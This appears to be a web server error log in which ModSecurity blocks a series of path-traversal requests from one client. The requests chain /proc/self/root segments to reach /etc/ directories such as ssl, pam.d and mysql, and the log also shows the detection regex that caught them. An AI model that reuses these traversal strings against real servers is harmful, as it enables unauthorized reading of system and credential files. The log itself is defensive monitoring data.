https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:28.630339 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:59946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbhJqj1wV0Si-OkefpEAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:29.851179 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:59948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbhQlT9VtDQc7bgUysQQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:33.303343 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:41786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbif9ocpUE4ed4uDzqUQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:34.582052 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:41802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbinbQATo66fKoS7xLEwAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:35.731119 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:41814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbi9SswJuvopo3lOhaXwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:37.026559 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:41824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbjbABkC4fWIHEf8HnPgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:39.475191 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:41832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbj7ysWC90G-1nBrBBvwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:41.000037 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:45484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbkBXjF1vJNtV6CWry7wAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:42.659062 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:45492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbkrysWC90G-1nBrBBwwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:44.139642 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:45498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgblJqj1wV0Si-OkefpGgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:45.411758 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:45502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgblZqj1wV0Si-OkefpGwAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:46.775016 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:45510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgblrABkC4fWIHEf8HnQAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:48.104999 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:45522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbmLABkC4fWIHEf8HnQgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:49.292221 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:45528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbmf9ocpUE4ed4uDzqXAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:50.670447 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:47996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbmtSswJuvopo3lOhaYgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:51.967038 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:48006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbm46lpbStxTqkSkto0AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:55.519543 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:48014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbn5qj1wV0Si-OkefpHgAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:56.803264 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:48020] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgboLysWC90G-1nBrBByQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:58.181097 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:48028] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgborysWC90G-1nBrBBygAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:03.215830 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:48044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbp5qj1wV0Si-OkefpJAAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:04.627055 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:43708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbqNSswJuvopo3lOhaZgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
